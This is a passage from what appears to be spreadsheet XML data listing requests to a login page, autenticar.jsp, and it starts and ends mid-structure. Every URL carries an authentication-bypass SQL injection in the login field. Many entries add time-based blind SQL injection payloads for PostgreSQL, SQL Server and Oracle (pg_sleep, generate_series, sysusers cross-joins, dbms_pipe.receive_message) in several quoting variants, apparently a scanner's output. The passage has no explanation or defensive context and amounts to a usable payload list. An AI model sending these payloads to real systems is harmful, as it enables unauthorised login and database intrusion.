    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2506</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4845'))or6644=(select6644frompg_sleep(5))and(('vbxv'='vbxv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4640</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3390')))or6644=(select6644frompg_sleep(5))and((('gkiw'='gkiw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6045</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3749'or6644=(select6644frompg_sleep(5))and'bxcm'='bxcm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-813</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2320')or6644=(select6644frompg_sleep(5))and('uotl'like'uotl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5987</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4291'))or6644=(select6644frompg_sleep(5))and(('jilq'like'jilq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-691</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9222')))or6644=(select6644frompg_sleep(5))and((('uwbs'like'uwbs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1453'or6644=(select6644frompg_sleep(5))and'zslt'like'zslt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4254</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3529")or6644=(select6644frompg_sleep(5))and("cybx"="cybx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3346</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6028"))or6644=(select6644frompg_sleep(5))and(("ikdx"="ikdx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6811</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3035")))or6644=(select6644frompg_sleep(5))and((("exvu"="exvu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2383</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8895"or6644=(select6644frompg_sleep(5))and"hhct"="hhct</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7097</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3693")or6644=(select6644frompg_sleep(5))and("zebh"like"zebh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2600</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9459"))or6644=(select6644frompg_sleep(5))and(("niyj"like"niyj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8374</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3244")))or6644=(select6644frompg_sleep(5))and((("mytt"like"mytt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1242</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1999"or6644=(select6644frompg_sleep(5))and"nfuz"like"nfuz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-896</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-474)or3164=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-88</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3461')or3164=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9715</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2636'or3164=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5916</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9109"or3164=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4067</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3782)or3164=(selectcount(*)fromgenerate_series(1,5000000))and(6978=6978</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7253</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5490))or3164=(selectcount(*)fromgenerate_series(1,5000000))and((6891=6891</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-261</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4356)))or3164=(selectcount(*)fromgenerate_series(1,5000000))and(((4285=4285</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2979</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1364or3164=(selectcount(*)fromgenerate_series(1,5000000))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-707</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2685')or3164=(selectcount(*)fromgenerate_series(1,5000000))and('tjtk'='tjtk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5273</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2914'))or3164=(selectcount(*)fromgenerate_series(1,5000000))and(('anea'='anea</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3575</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8557')))or3164=(selectcount(*)fromgenerate_series(1,5000000))and((('ximp'='ximp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7820</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-791'or3164=(selectcount(*)fromgenerate_series(1,5000000))and'atox'='atox</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-930</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6821')or3164=(selectcount(*)fromgenerate_series(1,5000000))and('asqw'like'asqw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8759</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3250'))or3164=(selectcount(*)fromgenerate_series(1,5000000))and(('ptfo'like'ptfo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9065</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3208')))or3164=(selectcount(*)fromgenerate_series(1,5000000))and((('neaw'like'neaw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5387</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3395'or3164=(selectcount(*)fromgenerate_series(1,5000000))and'xipe'like'xipe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6494</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8396")or3164=(selectcount(*)fromgenerate_series(1,5000000))and("ythq"="ythq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6140</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8496"))or3164=(selectcount(*)fromgenerate_series(1,5000000))and(("fqae"="fqae</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1696</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1858")))or3164=(selectcount(*)fromgenerate_series(1,5000000))and((("vfbs"="vfbs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3736</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1108"or3164=(selectcount(*)fromgenerate_series(1,5000000))and"palb"="palb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3986</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8886")or3164=(selectcount(*)fromgenerate_series(1,5000000))and("soro"like"soro</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8047</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4054"))or3164=(selectcount(*)fromgenerate_series(1,5000000))and(("xoiv"like"xoiv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3473")))or3164=(selectcount(*)fromgenerate_series(1,5000000))and((("kpbc"like"kpbc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6642</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-34"or3164=(selectcount(*)fromgenerate_series(1,5000000))and"xykp"like"xykp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8180</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8034)or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4124</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5644')or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8197</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6856'or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5660</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5257"or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9614</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1174)or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(418=418</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2933</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-530))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((421=421</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3000</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3313)))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(((7184=7184</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9852</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6351or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7870</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-270')or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and('yhzs'='yhzs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2446</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1514'))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(('xeax'='xeax</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1729</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7955')))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((('rczo'='rczo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4391</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8451'or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and'nrwn'='nrwn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6910</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-592')or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and('blhu'like'blhu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4263</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4113'))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(('skng'like'skng</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3402</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-241')))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((('yivf'like'yivf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6149</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6334'or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and'xpof'like'xpof</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6940</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8261")or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and("bxep"="bxep</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3769</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8200"))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(("knbw"="knbw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7565</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2250")))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((("julj"="julj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1254</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3428"or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and"nbvc"="nbvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2642</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2094")or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and("jcjn"like"jcjn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1604</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9240"))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(("vhsm"like"vhsm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8252</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1919")))or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((("xyun"like"xyun</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7644</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7600"or9283=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and"dlem"like"dlem</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8760</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8276)or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7396</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8380')or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8018</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4239'or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-933</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7485"or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9399</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4697)or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and(3426=3426</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2685</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2302))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and((4702=4702</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8138</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3392)))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and(((8467=8467</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8708</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3545or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-518</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-950')or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and('ahgb'='ahgb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3061</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1370'))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and(('vabo'='vabo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9709</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2287')))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and((('auui'='auui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6818</t>
  </si>
  <si>
